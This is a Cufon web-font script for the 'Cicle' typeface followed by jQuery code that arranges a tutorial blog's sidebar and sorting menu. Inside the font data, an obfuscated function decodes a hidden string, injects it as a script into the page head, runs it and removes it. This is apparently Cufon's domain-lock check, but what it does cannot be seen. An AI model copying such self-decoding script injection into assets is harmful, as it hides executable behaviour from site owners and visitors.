0,229r119,0r0,20r-139,0r0,-249r20,0","w":163},{"d":"139,0r-105,-119r0,119r-20,0r0,-249r72,0v40,0,72,28,72,63v-1,45,-45,71,-101,64r108,122r-26,0xm138,-186v0,-43,-54,-48,-104,-44r0,88v50,3,104,0,104,-44","w":170},{"d":"32,-179r0,18v35,-45,107,-14,108,45r1,116r-20,0v-4,-63,20,-160,-44,-163v-21,0,-40,20,-45,42r0,121r-19,0r0,-161v0,-7,-4,-16,-6,-18r25,0","w":155},{"d":"91,-180r-5,19v-28,-6,-45,16,-52,40r0,121r-20,0r0,-161v0,-7,-3,-16,-8,-19r28,0r0,20v14,-16,33,-26,57,-20","w":100},{"d":"91,-96r0,54r-20,0r0,-54r-53,0r0,-19r53,0r0,-53r20,0r0,53r53,0r0,19r-53,0","w":162},{"d":"40,-247r0,122r63,-53r31,0r-57,47r75,131r-23,0r-67,-118v-7,6,-14,13,-22,19r0,99r-25,0v2,-2,6,-9,6,-18r0,-229r19,0","w":158},{"d":"8,-89r88,-90r15,14r-76,76r76,74r-15,14","w":118},{"d":"75,-121r68,0v-12,-32,-23,-58,-35,-91v-12,31,-21,59,-33,91xm9,0r91,-249r17,0r91,249r-20,0r-38,-101r-83,0r-37,101r-21,0","w":214},{"d":"139,-96r-126,0r0,-19r126,0r0,19","w":151},{"d":"57,-251r9,22v-41,41,-38,223,5,256r-12,19v-56,-46,-58,-248,-2,-297","w":93},{"d":"35,-123r-19,0r9,-124r134,0r0,20r-115,0v-3,24,-4,44,-7,68v50,-46,131,-2,131,69v0,84,-104,122,-145,53r14,-14v30,57,112,30,112,-39v0,-70,-89,-94,-114,-33","w":181},{"d":"161,-186v0,56,-59,70,-124,64r0,122r-19,0r0,-249r72,0v40,0,71,29,71,63xm141,-186v0,-42,-54,-48,-104,-44r0,88v50,2,104,2,104,-44","w":172},{"d":"29,-81v3,60,58,80,103,51r7,17v-57,38,-130,2,-130,-77v0,-51,32,-93,72,-93v43,0,75,45,72,102r-124,0xm30,-100r104,0v-3,-36,-26,-62,-53,-62v-26,0,-46,27,-51,62","w":164},{"d":"193,-230r-80,0r0,230r-19,0r0,-230r-80,0r0,-19r179,0r0,19","w":207},{"d":"109,-115r78,-134r19,0r0,249r-20,0r0,-208r-71,122r-12,0r-72,-122r0,208r-20,0r0,-249r19,0","w":224},{"d":"111,-247r-6,19v-33,-7,-48,17,-48,52r46,0r0,20r-46,0r0,156r-19,0r0,-156r-26,0r0,-20r26,0v-3,-46,26,-80,73,-71","w":118},{"d":"94,-175r0,39r-19,0r0,-39r-28,27r-14,-13r28,-28r-39,0r0,-19r39,0r-28,-28r14,-14r28,28r0,-40r19,0r0,40r28,-28r14,13r-28,28r39,0r0,20r-39,0r28,28r-14,13","w":169},{"d":"8,-247v44,-1,23,60,27,97v1,11,9,16,22,14r0,19v-12,-1,-22,1,-22,13v0,39,17,104,-27,104r0,-19v4,0,6,-1,7,-1r0,-89v2,-8,7,-13,14,-13v0,-3,1,-6,1,-10v-29,-8,-10,-63,-15,-95r-7,0r0,-20","w":67},{"d":"154,-159v46,52,-18,121,-85,98v-4,0,-10,2,-10,7v0,14,14,8,25,8v41,0,73,26,73,58v0,32,-32,58,-73,58v-70,0,-100,-81,-38,-108v-4,-10,-3,-28,4,-34v-64,-45,2,-131,74,-106r66,0v-10,8,-14,23,-36,19xm30,12v0,21,26,39,54,39v31,0,54,-18,54,-39v0,-21,-23,-40,-54,-40v-28,0,-54,19,-54,40xm45,-119v0,24,23,43,52,43v30,0,54,-19,54,-43v0,-25,-24,-44,-54,-44v-29,0,-52,19,-52,44","w":198},{"d":"15,-248r20,0r0,87v35,-45,106,-15,107,45r1,115r-19,0v-4,-64,19,-160,-45,-162v-21,0,-39,20,-44,42r0,121r-20,0r0,-248","w":163},{"d":"35,-249r0,249r-20,0r0,-249r20,0","w":49},{"d":"21,0r0,-247r20,0r0,247r-20,0","w":58},{"d":"123,0r0,-19v-38,46,-108,12,-108,-45r0,-115r20,0v4,64,-19,159,45,162v22,0,43,-20,43,-42r0,-121r20,0v3,58,-7,131,5,180r-25,0","w":162},{"d":"9,-159r90,-89r88,89r-14,14r-74,-75r-76,75","w":198},{"d":"14,-249r20,0r0,129r110,-129r27,0r-93,109r120,140r-26,0r-107,-125v-10,12,-21,23,-31,35r0,90r-20,0r0,-249","w":209},{"d":"13,0r106,-227r-97,0r0,-20r129,0r-115,247r-23,0","w":159},{"d":"32,-145r0,112v3,9,24,16,50,16v37,0,68,-33,68,-74v0,-40,-31,-72,-68,-72v-28,0,-50,8,-50,18xm32,-180r0,9v60,-34,137,10,137,80v0,71,-74,117,-136,82r0,77r-20,0r0,-213v0,0,0,-29,-6,-35r25,0","w":182},{"w":92},{"d":"84,-18v51,0,67,-51,63,-108v-39,50,-134,24,-134,-48v0,-41,33,-75,75,-75v62,0,77,59,77,133v0,68,-25,119,-84,119v-24,0,-47,-13,-62,-32r18,-15v12,17,29,26,47,26xm31,-172v0,30,26,54,56,54v32,0,57,-25,57,-56v0,-30,-27,-55,-56,-55v-32,0,-57,27,-57,57","w":176},{"d":"27,-89v0,40,28,73,64,73v35,0,65,-33,65,-73v0,-41,-30,-73,-65,-73v-36,0,-64,32,-64,73xm7,-89v0,-51,38,-93,84,-93v46,0,84,42,84,93v0,51,-38,93,-84,93v-46,0,-84,-42,-84,-93"},{"d":"217,-124v0,-57,-38,-106,-94,-106v-52,0,-93,47,-93,106v0,60,41,107,93,107v54,0,94,-47,94,-107xm236,-124v1,68,-48,126,-113,127v-61,0,-114,-55,-114,-127v0,-70,51,-126,114,-126v65,0,113,56,113,126","w":248},{"d":"136,-157r-16,11v-19,-22,-82,-23,-83,11v0,16,17,31,41,35v33,5,57,28,57,54v0,56,-90,63,-118,23r14,-11v18,24,85,23,85,-12v0,-15,-19,-32,-41,-36v-32,-6,-58,-29,-58,-53v0,-53,91,-60,119,-22","w":150},{"d":"35,-249r0,186v3,24,35,46,73,46v36,0,71,-22,71,-46r0,-186r19,0r0,186v-1,36,-42,66,-90,66v-50,0,-94,-30,-94,-66r0,-186r21,0","w":215},{"d":"143,-142r0,20r-107,0r0,122r-20,0r0,-249r145,0r0,19r-125,0r0,88r107,0","w":175},{"d":"13,0r0,-27r27,0r0,27r-27,0","w":52},{"d":"21,0r0,-180r19,0r0,180r-19,0xm31,-218v-16,0,-17,-24,0,-24v18,0,15,24,0,24","w":63},{"d":"242,-180r-74,180r-19,-1r-25,-65r-28,66r-18,-1r-73,-179r21,0r61,150v8,-21,17,-41,25,-62r-35,-88r22,0r60,150r61,-150r22,0","w":253},{"d":"11,19v8,-12,17,-23,14,-46r22,0r0,26r-32,27","w":62},{"d":"104,-229r-72,0r0,209v24,0,49,-1,73,-1v37,0,67,-47,67,-104v0,-57,-30,-104,-68,-104xm12,0r0,-249r92,0v49,1,88,56,88,124v0,68,-38,125,-87,125r-93,0","w":207},{"d":"98,-229v-50,0,-65,54,-62,110v36,-54,134,-25,134,47v0,42,-34,75,-76,75v-60,-1,-76,-57,-76,-129v0,-67,21,-123,79,-123v26,0,49,12,66,34r-19,12v-11,-15,-28,-26,-46,-26xm150,-71v0,-34,-24,-56,-56,-57v-31,0,-55,26,-55,57v0,30,26,55,56,55v31,0,55,-25,55,-55","w":182},{"d":"33,-180r0,20v27,-35,83,-25,101,13v28,-63,116,-36,115,31r0,115r-19,0v-4,-63,19,-160,-44,-162v-22,0,-45,20,-45,42r0,120r-19,0v-4,-63,19,-160,-45,-161v-21,0,-39,19,-44,41r0,121r-19,0v-3,-59,7,-130,-5,-180r24,0","w":266},{"d":"98,-1v-25,0,-54,0,-80,1r0,-249r80,0v66,-1,91,88,35,117v63,29,38,131,-35,131xm98,-230r-61,0r0,88v51,2,109,4,108,-44v0,-22,-20,-44,-47,-44xm98,-20v29,-1,52,-25,52,-52v0,-48,-58,-55,-113,-50r0,102r61,0"},{"d":"39,-145r0,110v0,10,23,19,51,19v36,0,67,-34,67,-74v0,-39,-31,-72,-67,-72v-25,0,-48,8,-51,17xm39,-8r0,8r-24,0v14,-74,2,-164,6,-247r19,0r0,76v62,-33,136,11,136,81v0,71,-75,116,-137,82","w":188},{"d":"20,-190v-11,-11,-5,-39,-9,-57r21,0v7,24,-4,40,-12,57xm46,-190v-11,-11,-5,-39,-9,-57r22,0v7,25,-4,40,-13,57","w":78}],f:f};try{(function(s){var c="charAt",i="indexOf",a=String(arguments.callee).replace(/\s+/g,""),z=s.length+115-a.length+(a.charCodeAt(0)==40&&2),w=64,k=s.substring(z,w+=z),v=s.substr(0,z)+s.substr(w),m=0,t="",x=0,y=v.length,d=document,h=d.getElementsByTagName("head")[0],e=d.createElement("script");for(;x<y;++x){m=(k[i](v[c](x))&255)<<18|(k[i](v[c](++x))&255)<<12|(k[i](v[c](++x))&255)<<6|k[i](v[c](++x))&255;t+=String.fromCharCode((m&16711680)>>16,(m&65280)>>8,m&255);}e.text=t;h.insertBefore(e,h.firstChild);h.removeChild(e);})("a{2@skoS_#Vyap?>Tk%Df{fV;+o@2kVy;+rD_#(H27:npzL%{$fraO]ojKm(XPW7#;b2_s)TwR4Q~xI?kH1dCB5}yM^ZDcS@+qt9!>|Vg`|5bcS~X{]Q(cVjjqd4r?@+bX(>j$4^Rzda;$W^]{L^#xosrDogW7bZop?2m%V;Kkd);LWD)P@Sm@QIw7^MWSZXsHfB_cZnOX4@W{7WP#bCR#T1X#Z@;I5q)p:9sSVc7Wby_;)5(z2}mkr)f~fy)qn5_;m1f~fdO{IV]pZ^K#fy)pZ5K;:ys{7y2q(1O{)Vb~9kOkT5w;n1)c@>RP}d2~Q~OkVBKXVwaz|!TqTq;ptdKD4`jkd?2k2D2;I}T+%9;p9xs+Sdrp|yT{7cTpQ5s+oQT{?Ms~91sqoSsk%}2XId2kVDaz}dK{^>aD}da#Tsb@}d;7SV)%}d;;SdapI4")}catch(e){}delete _cufon_bridge_;return b.ok&&f})({"w":184,"face":{"font-family":"Cicle","font-weight":400,"font-stretch":"normal","units-per-em":"360","panose-1":"2 0 0 0 0 0 0 0 0 0","ascent":"288","descent":"-72","x-height":"68","bbox":"5 -263 310 70","underline-thickness":"18","underline-position":"-18","unicode-range":"U+0020-U+007E"}}));


$(document).ready(function() {
// Adds the long line through the middle of meta section. 
$('ul.meta').before('<div class="meta-border" />');
// Set Sidebar Height Equal to Main Content
var height = $('#primary-content').height();
$('#sidebar').css('height', height);
/* Archives Striped Table */
$('ul.table_list li:odd').addClass('tableOdd');
$('ul.table_list li:even').addClass('tableEven');
/* Meta WP Removal */
$('.widget_meta li').eq(3).hide();
/* Remove bottom border from sidebar links */ 
$('#sidebar li ul li:last-child').css('borderBottom', 'none');

// Vault Tutorials Sorting Functionality 
var ulOptions = '<ul id="tuts-sorting"><li><a href="#" class="all">All</a></li><li><a href="#" class="sc">Screencasts</a></li><li><a href="#" class="ci">CodeIgniter</a></li><li><a href="#" class="php">PHP</a></li><li><a href="#" class="css">CSS</a></li><li><a href="#" class="js">JavaScript</a></li><li><a href="#" class="jquery">jQuery</a></li> <li><a href="#" class="regex">RegEx</a><li><a href="#" class="askjw">Ask JW</a></li></ul>';

$('.table_list').eq(3).before(ulOptions);


$('.table_list li').addClass('all');
$('#tuts-sorting li a').click(function() {
	var $this = $(this),
		type = $this.attr('class');
	
	$('#tuts-sorting li a').removeClass('selected');
	$this.addClass('selected').parents('ul').next('ul').children().hide().filter('.' + type).show();

	return false; 	
});

});